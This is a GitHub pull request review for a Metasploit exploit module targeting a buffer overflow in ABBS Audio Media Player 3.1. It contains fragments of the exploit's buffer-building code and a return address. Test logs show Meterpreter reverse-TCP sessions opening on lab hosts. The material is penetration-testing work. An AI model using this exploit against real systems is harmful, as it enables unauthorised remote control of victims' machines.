Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added abbs amp exploit module #2038

Merged
merged 7 commits into from Jul 2, 2013
Merged

Added abbs amp exploit module #2038

merged 7 commits into from Jul 2, 2013

Conversation

modpr0be
Copy link
Contributor

This pull request is for an exploit module for ABBS Audio Media Player exploit posted on exploit-db with EDB-ID 25204.

jvazquez-r7
jvazquez-r7 reviewed Jul 1, 2013
View reviewed changes
modules/exploits/windows/fileformat/abbs_amp_lst.rb
[
[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is "\x00" a badchar bat can be used in the ret? I have not done badchars analysis by myself, just asking because sounds strange.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ah yes, i forgot to remove the \x00 bad char. It doesn't affect the stack after all.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

after a bit research, we still need the \x00 to be in badChars list to make the exploit works. Please see my latest commit 478beee

@jvazquez-r7
Copy link
Contributor

On the other hand, tried on Windows XP SP3 / ABBS Audio Media Player 3.1 and worked, comments should be discussed / fixed before we're able to land!:

msf exploit(abbs_amp_lst) > show options

Module options (exploit/windows/fileformat/abbs_amp_lst):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.lst          no        The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1


msf exploit(abbs_amp_lst) > rexploit
[*] Reloading module...

[+] msf.lst stored at /Users/juan/.msf4/local/msf.lst
msf exploit(abbs_amp_lst) > use exploit/multi/handler 
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:2371) at 2013-06-30 22:54:42 -0500

meterpreter > background
[*] Backgrounding session 1...

limhoff-r7
limhoff-r7 reviewed Jul 1, 2013
View reviewed changes
modules/exploits/windows/fileformat/abbs_amp_lst.rb
buffer = payload.encoded
buffer << rand_text(target['Offset'] - (payload.encoded.length))
buffer << [target.ret].pack('V')
buffer << rand_text_alpha_upper(800)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Where did the 800 suffix padding length come from? And why is it not dependent on the length of anything else in the buffer?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The 800 chars padding was added to fill the buffer and trigger the overflow. Is there any nice way to fill the buffer?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Well, that would be clearer if you had a constant like OVERFLOW_LENGTH that then calculated the fill length by doing

overflow_fill = OVERFLOW_LENGTH - buffer.length
buffer << rand_text_alpha_upper(overflow_fill)

That way the overflow will always be correct if the encoded payload were shorter than expected for some reason. It would also let you experiment to see what is the shortest length you can use to trigger the overflow so you can send a smaller exploit.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ah yes, ok I'll experiment with the buffer length and try to include your suggestion. Thanks! 👍

jvazquez-r7
jvazquez-r7 reviewed Jul 1, 2013
View reviewed changes
modules/exploits/windows/fileformat/abbs_amp_lst.rb
buffer = payload.encoded
buffer << rand_text(target['Offset'] - (payload.encoded.length))
buffer << [target.ret].pack('V')
buffer << rand_text(target['Max'] - buffer.length)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

And is it really needed? Sorry but doesn't look like a "standard" stack based buffer overflow, so really would like if it's needed at all to reach get EIP control?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Based on my last research, the module doesn't reach EIP if there's no additional buffer. But you're right, I reboot the box and it works now. The last junk is not needed as you said.

@jvazquez-r7
Copy link
Contributor

Oka, testing again and landing if working! thans @modpr0be !

@jvazquez-r7
Copy link
Contributor

Working:

msf exploit(abbs_amp_lst) > rexploit
[*] Reloading module...

[+] msf.lst stored at /Users/juan/.msf4/local/msf.lst
msf exploit(abbs_amp_lst) > use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1033) at 2013-07-01 23:18:36 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter >

merging.

jvazquez-r7 pushed a commit that referenced this pull request Jul 2, 2013
Land #2038, @modpr0be exploit for ABBS Audio Media Player
1110aef
@jvazquez-r7 jvazquez-r7 merged commit 2e53984 into rapid7:master Jul 2, 2013
@modpr0be modpr0be deleted the module-abbs-amp-exploit branch July 2, 2013 04:56
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@modpr0be @jvazquez-r7 @limhoff-r7